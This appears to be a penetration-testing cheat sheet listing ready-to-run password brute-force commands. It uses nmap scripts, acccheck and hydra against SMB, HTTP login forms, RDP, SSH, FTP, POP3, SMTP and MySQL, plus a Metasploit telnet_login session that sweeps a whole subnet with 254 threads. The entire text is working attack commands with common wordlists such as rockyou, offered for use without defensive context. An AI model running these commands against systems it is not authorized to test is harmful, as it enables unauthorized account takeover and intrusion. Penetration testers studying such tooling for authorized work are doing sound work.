[1] ## SMB bruteforece

nmap --script=smb-brute.nse 192.x.x.x

nmap -sV -p 445 --script smb-brute 192.168.13.200-254

acccheck -v -t 10.1.1.22 -u kevin -P /usr/share/wordlists/rockyou.txt


[2] ## HTTP bruteforce (forms)

hydra -l admin -P /root/ctf_wordlist.txt domain.com http-post-form "/admin.php:u=^USER^&p=^PASS^&f=login:'Enter your username and password to continue'" -V


[3] ## RDP bruteforce

hydra -t 4 -V -l root -P /usr/share/wordlists/rockyou.txt rdp://192.168.x.x

[4] ## SSH bruteforce

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.13.234 ssh

hydra -t 4 -L /usr/share/wordlists/cristi.txt -P /usr/share/wordlists/cristi-passwords.txt 192.168.13.236 ssh

hydra -t 4 -L /usr/share/wordlists/cristi.txt -p some_passsword 192.168.13.236 ssh

hydra -t 4 -l root -P /usr/share/wordlists/cristi-passwords.txt 127.0.0.1 -s 50000 ssh





[5] ## Bruteforce FTP

hydra -t 4 -L /usr/share/wordlists/cristi.txt -P /usr/share/wordlists/cristi-passwords.txt 192.168.13.236 ftp





[6] ## Bruteforce POP3

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.158 pop3

[7] ## DNS bruteforce

nmap -p 80 --script dns-brute.nse domain.com


[8] ## MySQL bruteforce

nmap -p 3306 --script mysql-brute --script-args userdb=/usr/share/wordlists/mysql_users.txt,passdb=/usr/share/wordists/rockyou.txt -vv 192.168.31.139

OR with hexorbase


[9] ## SMTP brute force

hydra -s 25 -v -V -l root@ucal.local -P /usr/share/wordlists/rockyou.txt -t 1 -w 20 -f 192.168.29.55 smtp

-l LOGIN name

-P load several passwords from FILE

-s port

-v verbose mode

-V show login+pass combination for each attempt

-t run TASKS number of connects in parallel

-w waittime for responses (32s) / between connects per thread

-f exit after the first found login/password pair


[10] ## Metasploit & Telnet bruteforce

mfsconsole

use auxiliary/scanner/telnet/telnet_login

msf auxiliary(telnet_login) > set BLANK_PASSWORDS false

BLANK_PASSWORDS => false

msf auxiliary(telnet_login) > set PASS_FILE passwords.txt

PASS_FILE => passwords.txt

msf auxiliary(telnet_login) > set RHOSTS 192.168.1.0/24

RHOSTS => 192.168.1.0/24

msf auxiliary(telnet_login) > set THREADS 254

THREADS => 254

msf auxiliary(telnet_login) > set USER_FILE users.txt

USER_FILE => users.txt

msf auxiliary(telnet_login) > set VERBOSE false

VERBOSE => false

msf auxiliary(telnet_login) > run

~ Enjoy The Movement!
